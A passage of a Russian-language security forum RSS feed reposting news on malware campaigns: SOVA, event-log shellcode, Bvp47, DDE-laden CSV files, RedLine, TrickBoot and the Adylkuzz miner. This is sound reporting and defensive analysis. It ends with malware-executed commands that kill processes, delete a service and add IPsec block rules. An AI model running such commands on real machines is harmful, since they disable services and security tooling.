По словам Клифи, даже в своем нынешнем незавершенном виде SOVA v5 готова к массовому развертыванию, поэтому всем пользователям Android рекомендуется проявлять бдительность.<br /><br />
Наконец, автор вредоносной программы, похоже, полон решимости и способен выполнить свои обещания от сентября 2021 года, придерживаясь графика разработки и добавляя расширенные функции каждые несколько месяцев.<br /><br />
Это делает SOVA все более опасной угрозой, поскольку банковский троян в настоящее время позиционирует себя как один из пионеров все еще недостаточно изученной области мобильных программ-вымогателей.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/sova-malware-adds-ransomware-feature-to-encrypt-android-devices/" rel="nofollow">https://www.bleepingcomputer.com/news/security/sova-malware-adds-ransomware-feature-to-encrypt-android-devices/</a>]]>
        </description>
    </item>
    <item>
        <title>Злоумышленники скрывают вредоносное ПО в журналах событий Windows</title>
        <link>https://chklst.ru/discussion/1928/zloumyshlenniki-skryvayut-vredonosnoe-po-v-zhurnalah-sobytiy-windows</link>
        <pubDate>Mon, 09 May 2022 14:59:22 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1928@/discussions</guid>
        <description><![CDATA[Исследователи безопасности заметили вредоносную кампанию, которая использовала журналы событий Windows для хранения вредоносного ПО, метод, который ранее не был публично задокументирован для атак в дикой природе.<br /><br />
Этот метод позволил злоумышленнику, стоящему за атакой, внедрить бесфайловое вредоносное ПО в файловую систему в ходе атаки, наполненной методами и модулями, предназначенными для обеспечения максимально скрытой активности.<br /><br />
Добавление полезных нагрузок в журналы событий Windows<br /><br />
Исследователи «Лаборатории Касперского» собрали образец вредоносного ПО после того, как продукт компании, оснащенный технологией обнаружения на основе поведения и контроля аномалий, идентифицировал его как угрозу для компьютера клиента.<br /><br />
Расследование показало, что вредоносное ПО было частью «очень целенаправленной» кампании и опиралось на большой набор инструментов, как пользовательских, так и имеющихся в продаже.<br />
Одной из наиболее интересных частей атаки является внедрение полезной нагрузки шелл-кода в журналы событий Windows для служб управления ключами (KMS).<br /><br />
Денис Легезо, ведущий исследователь безопасности в «Лаборатории Касперского», говорит, что этот метод был использован «впервые «в дикой природе» во время вредоносной кампании».<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1100723/2022/SilentBreak_APT_toolset_01.png" alt="SilentBreak_APT_toolset_01.png" /><br /><br />
Установщик копирует законный файл обработки ошибок ОС WerFault.exe в «C:\Windows\Tasks», а затем сбрасывает зашифрованный двоичный ресурс в «wer.dll» (отчеты об ошибках Windows) в том же месте для перехвата порядка поиска DLL. для загрузки вредоносного кода.<br /><br />
Перехват DLL — это метод взлома, который использует законные программы с недостаточной проверкой для загрузки в память вредоносной библиотеки динамической компоновки (DLL) по произвольному пути.<br /><br />
Легезо говорит, что целью дроппера является загрузка на диск для процесса боковой загрузки и поиск определенных записей в журналах событий (категория 0x4142 — «AB» в ASCII. Если такая запись не найдена, он записывает фрагменты по 8 КБ). зашифрованный шелл-код, который позже объединяется для формирования кода для следующего стейджера.<br /><blockquote>

<div>«Упавшая wer.dll является загрузчиком и не причинит вреда без шелл-кода, спрятанного в журналах событий Windows», — Денис Легезо, ведущий исследователь безопасности в «Лаборатории Касперского».</div>
</blockquote>
<br />
Новый метод, проанализированный «Лабораторией Касперского», вероятно, станет более популярным, поскольку Сумьядип Басу, в настоящее время являющийся стажером в красной команде Mandiant,
<blockquote>

<div><a href="https://gist.github.com/sbasu7241/bfcdd24492182f9143d99c45853efc42" rel="nofollow">создал и опубликовал на GitHub исходный код для внедрения полезных нагрузок в журналы событий Windows.</a></div>
</blockquote>
<br />
Технически продвинутый актер<br /><br />
Основываясь на различных методах и модулях (наборы для пен-тестирования, настраиваемые оболочки для защиты от обнаружения, трояны последней стадии), использованных в кампании, Легезо отмечает, что вся кампания «выглядит впечатляюще».<br /><br />
Он сказал, что «актер, стоящий за этой кампанией, сам по себе довольно опытен или, по крайней мере, имеет хороший набор довольно сложных коммерческих инструментов», что указывает на противника уровня APT.<br /><br />
Среди инструментов, использованных в атаке, — коммерческие фреймворки для тестирования на проникновение Cobalt Strike и NetSPI (бывший SilentBreak).<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1100723/2022/SilentBreak_APT_Tools.jpg" alt="SilentBreak_APT_Tools.jpg" /><br /><br />
Хотя некоторые модули в атаке считаются заказными, исследователь отмечает, что они могут быть частью платформы NetSPI, для тестирования которой была недоступна коммерческая лицензия.<br /><br />
Например, два троянца с именами ThrowbackDLL.dll и SlingshotDLL.dll могут быть инструментами с тем же именем, которые, как известно, являются частью системы тестирования на проникновение SilentBreak.<br /><br />
«Мы начали исследование с последней стадии in-memory, а затем с помощью нашей телеметрии смогли реконструировать несколько цепочек заражения», — Денис Легезо.<br /><br />
Расследование проследило начальную стадию атаки до сентября 2021 года, когда жертву обманом заставили скачать RAR-архив с файлообменника file.io.<br /><br />
Затем злоумышленник распространил модуль Cobalt Strike, подписанный сертификатом компании Fast Invest ApS. Сертификат использовался для подписи 15 файлов, и ни один из них не был законным.<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1100723/2022/SilentBreak_APT_cert.jpg" alt="SilentBreak_APT_cert.jpg" /><br /><br />
Исследователь сообщил, что в большинстве случаев конечной целью целевого вредоносного ПО с такой функциональностью последней стадии является получение некоторых ценных данных от жертв.<br /><br />
При изучении атаки «Лаборатория Касперского» не обнаружила сходства с предыдущими кампаниями, связанными с известным злоумышленником.<br /><br />
Пока не будет установлена связь с известным противником, исследователи отслеживают новую активность как SilentBreak, по названию инструмента, наиболее часто используемого в атаке.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/" rel="nofollow">https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/</a><br /><a href="https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/" rel="nofollow">https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/</a>]]>
        </description>
    </item>
    <item>
        <title>Lynux Backdoor не детектировался в течение 10 лет</title>
        <link>https://chklst.ru/discussion/1923/lynux-backdoor-ne-detektirovalsya-v-techenie-10-let</link>
        <pubDate>Sat, 26 Feb 2022 08:45:20 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1923@/discussions</guid>
        <description><![CDATA[Отчет, выпущенный сегодня, погружает в технические аспекты Lynux Backdoor, теперь отслеживается в качестве BVP47.<br /><br />
BVP47 выжил до сегодняшнего дня, несмотря на то, что он представлен в базу данных в конце 2013 года.<br /><br />
До этого утра только один антивирусный движок детектировал образец BVP47. По мере распространения доклада в сообществе Infosec обнаружение начало улучшаться, помеченные шестью движками в момент написания письма.<br /><br />
Соединение группы уравнений<br /><br />
Команда Advanced Cyber Security Research в Pangu Lab, китайской компании по кибербезопасности, говорит, что она обнаружила неуловимое вредоносное ПО в 2013 году во время «криминалистического расследования хоста в ключевом внутреннем отделе».<br /><br />
Образец Bvp47, полученный в результате судебного расследования, оказался продвинутым бэкдором для Linux с функцией удаленного управления, защищенной с помощью алгоритма асимметричной криптографии RSA, для включения которого требуется закрытый ключ.<br /><br />
Они нашли закрытый ключ в утечках, опубликованных хакерской группой Shadow Brokers в период с 2016 по 2017 год, которые содержали хакерские инструменты и эксплойты нулевого дня, используемые командой кибератак АНБ, Equation Group.<br /><br />
Некоторые компоненты утечек Shadow Brokers были интегрированы в структуру Bvp47 — «dewdrop» и «solutionchar_agents», — что указывает на то, что имплантат распространялся на операционные системы на базе Unix, такие как основные дистрибутивы Linux, Juniper JunOS, FreeBSD и Solaris.<br /><br />
Помимо того, что Pangu Lab связывает вредоносное ПО Bvp47 с Equation Group, автоматический анализ бэкдора также показывает сходство с другим образцом того же субъекта.<br /><br />
Kaspersky Threat Attribution Engine (KTAE) показывает, что 34 из 483 строк соответствуют строкам из другого образца, связанного с Equation, для систем Solaris SPARC, который имеет 30% сходство с еще одним вредоносным ПО Equation, отправленным в Virus Total в 2018 году и опубликованным исследователем угроз. Дерес 24 января 2022 г.<br /><br />
Костин Райу, директор группы глобальных исследований и анализа в «Лаборатории Касперского», сообщил BleepingComputer, что сходство на уровне кода Bvp47 соответствует одному образцу в текущей коллекции вредоносных программ компании.<br /><br />
Это указывает на то, что вредоносное ПО не использовалось широко, как это обычно происходит с хакерскими инструментами от высокопоставленных злоумышленников, которые используют их в узконаправленных атаках.
<blockquote>

<div>В случае с бэкдором Bvp47 Linux исследователи Pangu Lab говорят, что он использовался против целей в телекоммуникационном, военном, высшем образовании, экономическом и научном секторах.</div>
</blockquote>
<br />
Они отмечают, что вредоносное ПО поразило более 287 организаций в 45 странах и оставалось практически незамеченным более 10 лет.<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1100723/2022/APT%20Groups/NSA/Bvp47_targets_Pangu.jpg" alt="Bvp47_targets_Pangu.jpg" /><br /><br />
Этапы атаки<br /><br />
Анализ инцидента, проведенный Pangu Lab, включал три сервера, один из которых был целью внешней атаки, а два других внутренних компьютера — сервер электронной почты и бизнес-сервер.<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1100723/2022/APT%20Groups/NSA/Bvp47VT_attack.jpg" alt="Bvp47VT_attack.jpg" /><br /><br />
По словам исследователей, злоумышленник установил соединение между внешним сервером и почтовым сервером через пакет TCP SYN с полезной нагрузкой 264 байта.<br /><br />
«Почти одновременно сервер [электронной почты] подключается к службе SMB [бизнес-сервера] и выполняет некоторые конфиденциальные операции, включая вход на [бизнес-сервер] с учетной записью администратора, попытку открытия терминальных служб, перечисление каталогов, и выполнение сценариев Powershell через запланированные задачи »- <a href="https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/" rel="nofollow"><b>Pangu Lab</b></a><br /><br />
Затем бизнес-сервер подключился к электронной почте для загрузки дополнительных файлов, «включая сценарий Powershell и зашифрованные данные второго этапа».<br /><br />
На одной из двух скомпрометированных машин запускается HTTP-сервер, который отправляет на другую два HTML-файла. Одним из файлов был сценарий PowerShell в кодировке base64, который загружал «index.htm», содержащий асимметрично зашифрованные данные.<br /><br />
Соединение между двумя внутренними машинами используется для передачи зашифрованных данных по «своему собственному протоколу», говорят исследователи Pangu Lab в своем отчете.<br /><br />
Исследователи смогли восстановить связь между серверами и резюмировали ее в следующие этапы, где машина A — это внешняя система, а V1/V2 — почтовый и бизнес-сервер соответственно:<br /><br />
Машина A подключается к порту 80 сервера V1, чтобы отправить запрос на стук и запустить бэкдор-программу на сервере V1.<br />
Сервер V1 обратно подключается к высокопроизводительному порту компьютера A, чтобы установить конвейер данных.<br />
Сервер V2 подключается к бэкдорной веб-службе, открытой на сервере V1, и получает выполнение PowerShell от сервера V1.<br />
Сервер V1 подключается к служебному порту SMB сервера V2 для выполнения командных операций.<br />
Сервер V2 устанавливает соединение с сервером V1 на высокопроизводительном порту и использует собственный протокол шифрования для обмена данными.<br />
Сервер V1 синхронизирует взаимодействие данных с машиной A, а сервер V1 действует как передача данных между машиной A и сервером V2.<br /><br />
Ссылаясь на вышеупомянутую технологию связи между тремя серверами, исследователи считают, что бэкдор является созданием «организации с сильными техническими возможностями».<br /><br /><a href="https://www.bleepingcomputer.com/news/security/nsa-linked-bvp47-linux-backdoor-widely-undetected-for-10-years/" rel="nofollow">https://www.bleepingcomputer.com/news/security/nsa-linked-bvp47-linux-backdoor-widely-undetected-for-10-years/</a><br /><br />]]>
        </description>
    </item>
    <item>
        <title>Текстовые файлы CSV, используются для установки вредоносного ПО BazarBackdoor</title>
        <link>https://chklst.ru/discussion/1921/tekstovye-fayly-csv-ispolzuyutsya-dlya-ustanovki-vredonosnogo-po-bazarbackdoor</link>
        <pubDate>Fri, 04 Feb 2022 00:39:18 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1921@/discussions</guid>
        <description><![CDATA[
<blockquote>

<div>Новая фишинговая кампания использует специально созданные текстовые файлы CSV для заражения устройств пользователей вредоносным ПО BazarBackdoor.</div>
</blockquote>
Файл значений, разделенных запятыми (CSV), представляет собой текстовый файл, содержащий строки текста со столбцами данных, разделенными запятыми. Во многих случаях первая строка текста является заголовком или описанием для каждого столбца.<br /><br />
Использование файлов CSV — это популярный метод экспорта данных из приложений, которые затем можно импортировать в другие программы в качестве источника данных, будь то Excel, база данных, менеджеры паролей или программное обеспечение для выставления счетов.<br /><blockquote>

<div>Поскольку CSV — это просто текст без исполняемого кода, многие люди считают эти типы файлов безвредными и могут быть более беззаботными при их открытии.<br /><br />
Однако Microsoft Excel поддерживает функцию динамического обмена данными (DDE), которую можно использовать для выполнения команд, выходные данные которых вводятся в открытую электронную таблицу, включая файлы CSV.</div>
</blockquote>
<br />
К сожалению, злоумышленники также могут злоупотреблять этой функцией для выполнения команд, загружающих и устанавливающих вредоносные программы на ничего не подозревающих жертвах.<br /><br />
Файл CSV использует DDE для установки BazarBackdoor.<br /><br />
Новая фишинговая кампания, обнаруженная исследователем безопасности Крисом Кэмпбеллом, устанавливает троян BazarLoader/BazarBackdoor через вредоносные CSV-файлы.<br /><br />
BazarBackdoor — скрытая вредоносная программа-бэкдор, созданная группой TrickBot для предоставления злоумышленникам удаленного доступа к внутреннему устройству, которое можно использовать в качестве плацдарма для дальнейшего бокового перемещения в сети.<br /><br />
Фишинговые электронные письма выдают себя за «рекомендации по переводу платежей» со ссылками на удаленные сайты, которые загружают CSV-файл с именами, похожими на «document-21966.csv».<br /><br /><img src="https://www.bleepstatic.com/images/news/malware/b/bazaloader/csv-file/spam-email.jpg" alt="spam-email.jpg" /><br /><br />
Как и все файлы CSV, файл document-21966.csv представляет собой просто текстовый файл со столбцами данных, разделенными запятыми<br /><br /><img src="https://www.bleepstatic.com/images/news/malware/b/bazaloader/csv-file/malicious-csv-file.jpg" alt="malicious-csv-file.jpg" /><br /><br />
Однако замечаем, что один из столбцов данных содержит странный вызов WMIC в одном из столбцов данных, который запускает команду PowerShell.<br /><br />
Это =WmiC| Команда — это функция DDE, которая заставляет Microsoft Excel при наличии разрешения запускать WMIC.exe и выполнять предоставленную команду PowerShell для ввода данных в открытую книгу.<br /><br />
В этом конкретном случае DDE будет использовать WMIC для создания нового процесса PowerShell, который открывает удаленный URL-адрес, содержащий другую команду PowerShell, которая затем выполняется.<br /><br />
Команда удаленного сценария PowerShell, показанная ниже, загрузит файл picture.jpg и сохранит его как C:\Users\Public\87764675478.dll. Затем эта программа DLL запускается с помощью команды rundll32.exe.<br /><br /><img src="https://www.bleepstatic.com/images/news/malware/b/bazaloader/csv-file/powershell-command.jpg" alt="powershell-command.jpg" /><br /><br />
Файл DLL установит BazarLoader, в конечном итоге развернув BazarBackdoor и другие полезные нагрузки на устройстве.<br /><br />
К счастью, когда этот CSV-файл открывается в Excel, программа обнаружит вызов DDE и предложит пользователю «включить автоматическое обновление ссылок», что помечено как проблема безопасности.<br /><br />
Даже если они активируют эту функцию, <b>Excel покажет им другое приглашение, подтверждающее, следует ли разрешить WMIC начать доступ к удаленным данным. </b><br /><br />
Если пользователь подтвердит оба запроса, Microsoft Excel запустит сценарии PowerShell, DLL будет загружена и выполнена, а BazarBackdoor будет установлен на устройстве.<br /><br />
Хотя эта угроза требует от пользователей подтверждения того, что функция DDE должна быть разрешена для выполнения, генеральный директор AdvIntel Виталий Кремез сказал, что люди становятся жертвами продолжающейся фишинговой атаки.<br /><br />
«Исходя из данных телеметрии BazarBackdoor, за последние два дня мы обнаружили 102 реальных корпоративных и государственных жертвы, не входящих в песочницу, в результате этой фишинговой кампании», — пояснил Кремез в онлайн-обсуждении.<br /><br />
После установки BazarBackdoor злоумышленники получат доступ к корпоративной сети, которую атаки будут использовать для горизонтального распространения по всей сети.<br /><br />
В конечном итоге это может привести к дальнейшему заражению вредоносным ПО, краже данных и внедрению программ-вымогателей.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/" rel="nofollow">https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/</a>]]>
        </description>
    </item>
    <item>
        <title>RedLine: почему не стоит сохранять пароли в браузерах</title>
        <link>https://chklst.ru/discussion/1916/redline-pochemu-ne-stoit-sohranyat-paroli-v-brauzerah</link>
        <pubDate>Wed, 29 Dec 2021 04:42:24 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1916@/discussions</guid>
        <description><![CDATA[Вредоносное ПО для кражи информации <b>RedLine</b> нацелено на популярные веб-браузеры, такие как Chrome, Edge и Opera, демонстрируя, почему хранить ваши пароли в браузерах - плохая идея.<br /><br />
Эта вредоносная программа представляет собой средство для кражи информации, которое можно купить примерно за 200 долларов на форумах по борьбе с киберпреступностью и развернуть, не требуя особых знаний и усилий.<br /><br />
Однако в новом отчете AhnLab ASEC содержится предупреждение о том, что удобство использования функции автоматического входа в систему в веб-браузерах становится серьезной проблемой безопасности, затрагивающей как организации, так и отдельных лиц.<br /><br />
В примере, представленном аналитиками, удаленный сотрудник потерял учетные данные VPN-аккаунта субъектам RedLine Stealer, которые использовали эту информацию для взлома сети компании три месяца спустя.<br /><br />
Несмотря на то, что на зараженном компьютере было установлено решение для защиты от вредоносных программ, оно не смогло обнаружить и удалить <b>RedLine Stealer</b>.<br /><blockquote>

<div>Вредоносная программа нацелена на файл данных входа в систему, который есть во всех веб-браузерах на основе Chromium, и представляет собой базу данных SQLite, в которой сохраняются имена пользователей и пароли.</div>
</blockquote>
<br /><img src="https://www.bleepstatic.com/images/news/u/1220909/Security/database.png" alt="database.png" /><br /><br />
Даже когда пользователи отказываются хранить свои учетные данные в браузере, система управления паролями все равно будет добавлять запись, указывающую, что конкретный веб-сайт находится в «черном списке».<br /><br />
Хотя злоумышленник может не иметь паролей для этой «занесенной в черный список» учетной записи, он сообщает им, что учетная запись существует, что позволяет им выполнять заполнение учетных данных или атаки социальной инженерии / фишинга.<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1220909/Tables/features.jpg" alt="features.jpg" /><div>
Features of the RedLine Stealer
</div>
<br />
После сбора украденных учетных данных злоумышленники либо используют их в дальнейших атаках, либо пытаются монетизировать их, продавая на торговых площадках темной сети.<br /><br />
Примером того, насколько популярной среди хакеров стала RedLine, является рост рынка темной сети 2easy, где половина всех проданных данных была украдена с помощью этого вредоносного ПО.<br /><br />
Еще один недавний случай распространения RedLine - это кампания по рассылке спама через контактную форму веб-сайта, в которой используются файлы Excel XLL, которые загружают и устанавливают вредоносное ПО для кражи паролей.<br /><blockquote>

<div>Это похоже на то, что RedLine сейчас повсюду, и основная причина этого - его эффективность в использовании широко доступного бреши в безопасности, которую современные веб-браузеры отказываются устранять.</div>
</blockquote>
<br />
Что делать<br /><br />
Использование веб-браузера для хранения учетных данных для входа в систему заманчиво и удобно, но делать это рискованно даже без заражения вредоносным ПО.<br /><br />
Таким образом, локальный или удаленный субъект, имеющий доступ к вашей машине, может украсть все ваши пароли за считанные минуты.<br /><br /><b>Вместо этого было бы лучше использовать специальный менеджер паролей, который хранит все в зашифрованном хранилище и запрашивает главный пароль для его разблокировки.</b><br /><br />
Более того, вам следует настроить определенные правила для конфиденциальных веб-сайтов, таких как порталы электронного банкинга или веб-страницы корпоративных активов, требующие ручного ввода учетных данных.<br /><br />
Наконец, активируйте многофакторную аутентификацию везде, где она доступна, поскольку этот дополнительный шаг может спасти вас от инцидентов, связанных с захватом учетной записи, даже если ваши учетные данные были скомпрометированы.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/redline-malware-shows-why-passwords-shouldnt-be-saved-in-browsers/" rel="nofollow">https://www.bleepingcomputer.com/news/security/redline-malware-shows-why-passwords-shouldnt-be-saved-in-browsers/</a>]]>
        </description>
    </item>
    <item>
        <title>TrickBot: новый модуль  предназначен для заражения систем</title>
        <link>https://chklst.ru/discussion/1858/trickbot-novyy-modul-prednaznachen-dlya-zarazheniya-sistem</link>
        <pubDate>Fri, 04 Dec 2020 15:22:06 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1858@/discussions</guid>
        <description><![CDATA[<img src="https://www.bleepstatic.com/content/hl-images/2020/12/02/TrickBoot1.jpg" alt="TrickBoot1.jpg" /><br /><br /><b>новый модуль  предназначен для заражения прошивки UEFI</b><br /><br />
Разработчики вредоносного ПО <b>TrickBot</b> создали новый модуль, который исследует уязвимости UEFI, демонстрируя усилия злоумышленника на уровне, который дал бы им полный контроль над зараженными машинами.<br /><br />
Имея доступ к прошивке UEFI, злоумышленник установит на скомпрометированной машине контроль, который сохраняется после переустановки операционной системы или замены накопителей.<br /><br />
Вредоносный код, внедренный в прошивку (буткиты), невидим для решений безопасности, работающих поверх операционной системы, потому что он загружается раньше всего, на начальном этапе загрузки компьютера.<br /><br />
Буткиты позволяют контролировать процесс загрузки операционной системы и саботировать защиту на более высоком уровне. Поскольку код запускается на самой ранней стадии, механизм безопасной загрузки не помогает, так как он зависит от целостности прошивки.<br /><br />
Последствия, связанные с получением злоумышленником такого постоянного присутствия на машине, огромны, особенно в случае TrickBot, чье среднее ежедневное заражение может достигать нескольких тысяч.<br /><br />
Ориентация на платформы Intel<br /><br />
Сегодня в совместном отчете отдела кибербезопасности Advanced Intelligence (AdvIntel) и исследователей из фирмы Eclypsium, занимающейся аппаратным обеспечением и безопасностью, представлены технические подробности о новом компоненте TrickBot.<br /><br />
На этом этапе TrickBoot действует как средство разведки, проверяя наличие уязвимостей в прошивке UEFI зараженной машины. На данный момент проверка нацелена только на платформы Intel (Skylake, Kaby Lake, Coffee Lake, Comet Lake). Тем не менее, модуль также включает в себя код для чтения, записи и стирания прошивки, поэтому его можно использовать для значительных повреждений.<br /><br />
Он проверяет, активна ли защита от записи UEFI / BIOS, с помощью драйвера RwDrv.sys от RWEverything, бесплатной утилиты, которая обеспечивает доступ к аппаратным компонентам, таким как микросхема флэш-памяти SPI, на которой хранится прошивка BIOS / UEFI системы.<br /><br />
Данный инструмент использовался в LoJax, первом рутките UEFI, обнаруженным в дикой природе, в результате атаки российских хакеров, известных как APT28 (Fancy Bear, Sednit, Strontium, Sofacy).<br /><blockquote>

<div>«Все запросы к прошивке UEFI, хранящейся во флэш-чипе SPI, проходят через контроллер SPI, который является частью концентратора контроллеров платформы (PCH) на платформах Intel. Этот контроллер SPI включает механизмы контроля доступа, которые можно заблокировать во время процесса загрузки, чтобы предотвратить несанкционированное изменение прошивки UEFI, хранящейся в микросхеме флэш-памяти SPI »</div>
</blockquote>
- совместный отчет (Eclypsium, AdvIntel)<br /><br />
Исследователи говорят, что защита от <b>записи BIOS / UEFI доступна в современных системах</b>, но эта функция часто не активна или настроена неправильно, что позволяет злоумышленникам изменить прошивку или удалить ее, чтобы заблокировать устройство.<br /><br />
Исследователи обнаружили модуль 19 октября и назвали его TrickBoot, за его функциональность и название вредоносного ботнета, которое его развертывает.<br /><br />
В образце, проанализированном Advanced Intelligence, исследователи обнаружили имя «PermaDll», связанное с файлом «user_platform_check.Dll» в новом образце TrickBot.<br /><br />
Изучение файла с помощью Eclypsium показало, что злоумышленник реализовал механизм, который проверял однокристальный чипсет в скомпрометированной системе.<br /><br />
Исследователи обнаружили, что роль модуля заключалась в выполнении запросов PCH для определения конкретной модели PCH, запущенной в системе, таким образом идентифицируя платформу. Эта информация также позволяет злоумышленнику проверить, уязвима платформа или нет.<br /><br />
Исследователи также обнаружили, что актер использует функции известного инструмента эксплуатации встроенного ПО и библиотеки под названием fwexpl для следующих целей:<br /><br />
читать данные с аппаратных портов ввода-вывода<br />
вызвать драйвер rwdrv.sys для записи данных в аппаратные порты ввода-вывода<br />
вызвать драйвер rwdrv.sys для чтения данных из адресов физической памяти<br />
вызвать драйвер rwdrv.sys для записи данных по адресам физической памяти<br /><br />
Исследователи отмечают, что если TrickBoot работает на платформе, отсутствующей в его таблице поиска, он активирует функцию с предварительно установленным Skylake набором значений по умолчанию для операций, требующих доступа к оборудованию.<br /><br />
После идентификации платформы TrickBoot обращается к путям, связанным с чтением регистров для флэш-памяти (SPIBAR, PRO-PR4) и управлением BIOS (BC - содержит биты блокировки защиты от записи для доступа к BIOS на аппаратном уровне).<br /><br />
Интересной находкой в функции, которая пытается отключить защиту от записи BIOS, является то, что она содержит ошибку, которая считывается с неправильного смещения в регистре управления BIOS, чтобы проверить, установлен ли бит отключения защиты от записи BIOS. Это приводит к тому, что код интерпретирует, что защита от записи активна, и пытается ее отключить.<br /><br /><b>Основные последствия</b><br /><br />
TrickBot, разрабатывающий такой модуль, ясно указывает на то, что злоумышленник прилагает усилия для расширения своего контроля над скомпрометированными системами. В ботнете уже есть тысячи зараженных машин, на которых злоумышленник может выбирать наиболее ценные цели.<br /><br />
Телеметрия AdvIntel показывает, что ежедневное число заражений TrickBot с 3 октября по 21 ноября достигло пика в 40 000, а в среднем - от 200 до 4 000. Эти цифры консервативны, так как не учитываются зараженные компьютеры в частных сетях, которые взаимодействуют извне, используя IP-адрес шлюза.<br /><br />
Выбор наиболее прибыльных жертв осуществляется вручную на основе данных, полученных с помощью сценариев разведки, которые извлекают информацию из сетей, оборудования и программного обеспечения жертвы.<br /><br />
Операторы финансово мотивированы и используют ботнет для доставки программ-вымогателей Ryuk и Conti на дорогостоящие машины. С 2018 года они заработали не менее 150 миллионов долларов. Только у одной недавней жертвы они взяли 2200 BTC (на тот момент они оценивались в 34 миллиона долларов).<br /><br />
TrickBot - действительно киберпреступное предприятие, вовлеченное в несколько схем зарабатывания денег, включая банковское мошенничество и кражу финансовой / личной информации.<br /><br /><b>Защита</b><br /><br />
Джесси Майкл, из Eclypsium, пишет, что определение того, была ли взломана система на уровне прошивки UEFI, является сложной задачей.<br /><br />
Более тщательный метод состоит в том, чтобы прочитать содержимое микросхемы памяти SPI, когда система выключена, путем физического подключения устройства программирования флэш-памяти SPI. Однако это решение требует не только опыта, но и длительного простоя компании, поскольку в некоторых случаях микросхема припаяна к материнской плате, и это сопряжено с риском проблем с чтением.<br /><br /><b>Другой метод - использовать инструменты с открытым исходным кодом (CHIPSEC) или платформу Eclypsium, которая ищет слабые места на уровне оборудования и прошивки, а также может определить, активна ли защита от записи BIOS.<br /><br />
Проверка хэшей прошивки также помогает определить, не был ли изменен код. Кроме того, обновление прошивки - хороший способ убедиться, что она не подвержена известным уязвимостям.</b><br /><br />
На основе анализа образца TrickBoot модуль только идентифицирует оборудование и проверяет, доступна ли запись в область BIOS. Но это можно легко изменить, чтобы разрешить запись во флэш-память SPI и изменить прошивку системы.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/trickbots-new-module-aims-to-infect-your-uefi-firmware/" rel="nofollow">https://www.bleepingcomputer.com/news/security/trickbots-new-module-aims-to-infect-your-uefi-firmware/</a>]]>
        </description>
    </item>
    <item>
        <title>Майнеры криптовалют используют EternalBlue/DoublePulsar</title>
        <link>https://chklst.ru/discussion/1596/maynery-kriptovalyut-ispolzuyut-eternalblue-doublepulsar</link>
        <pubDate>Mon, 12 Jun 2017 12:02:43 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1596@/discussions</guid>
        <description><![CDATA[Шифровальщик WannaCry (он же Wana Decrypt0r, WCry, WannaCrypt0r и WannaCrypt), как оказалось, был отнюдь не единственной малварью, которая эксплуатировала уязвимость в SMB и использовала похищенные у АНБ эксплоиты ETERNALBLUE и DOUBLEPULSAR.<br /><br /><a href="https://www.proofpoint.com/us/blog\threat-insight/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" rel="nofollow"><b>Специалисты компании Proofpoint обнаружили криптовалютный майнер <i>Adylkuzz</i></b></a> , который преимущественно занимается майнингом валюты Monero. По данным специалистов, малварь использует точно такой же механизм распространения, как и WannaCry: сканирует SMB-порты, применяет эксплоит ETERNALBLUE и заражает уязвимые системы без ведома пользователей, задействовав DOUBLEPULSAR.<br /><blockquote>

<div>On Friday, May 12, attackers spread a massive ransomware attack worldwide using the EternalBlue exploit to rapidly propagate the malware over corporate LANs and wireless networks. EternalBlue, originally exposed on April 14 as part of the Shadow Brokers dump of NSA hacking tools, leverages a vulnerability (MS17-010) in Microsoft Server Message Block (SMB) on TCP port 445 to discover vulnerable computers on a network and laterally spread malicious payloads of the attacker’s choice. This particular attack also appeared to use an NSA backdoor called DoublePulsar to actually install the ransomware known as WannaCry.</div>
</blockquote>
<br />
Более того, исследователи уверены, что вредоносная кампания Adylkuzz стартовала гораздо раньше WannaCry, как минимум 2 мая 2017 года, а возможно даже раньше – 24 апреля 2017 года. Adylkuzz не привлек к себе так много внимания, как нашумевший шифровальщик, по той простой причине, что заметить заражение в этом случае гораздо сложнее. Единственные «симптомы», на которые может обратить внимание пострадавший, это замедление работы ПК, так как майнер оттягивает на себя ресурсы системы.<br /><br />
Специалисты отмечают, что Adylkuzz в некотором роде защитил пострадавших от него пользователей от атак WannaCry.<br /><br />
После успешной эксплуатации через EternalBlue машины заражаются DoublePulsar. Затем бэкдор DoublePulsar загружает и запускает Adylkuzz с другого хоста. После запуска Adylkuzz сначала остановит все потенциальные уже запущенные экземпляры и заблокирует обмен данными по протоколу SMB, чтобы избежать дальнейшего заражения. Затем он определяет общедоступный IP-адрес жертвы и загружает инструкции по майнингу, криптомайнер и инструменты очистки.<br /><blockquote>

<div>Executed commands:<br /><br />
taskkill /f /im hdmanager.exe<br />
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding<br />
taskkill /f /im mmc.exe<br />
sc stop WELM<br />
sc delete WELM<br />
netsh ipsec static add policy name=netbc<br />
netsh ipsec static add filterlist name=block<br />
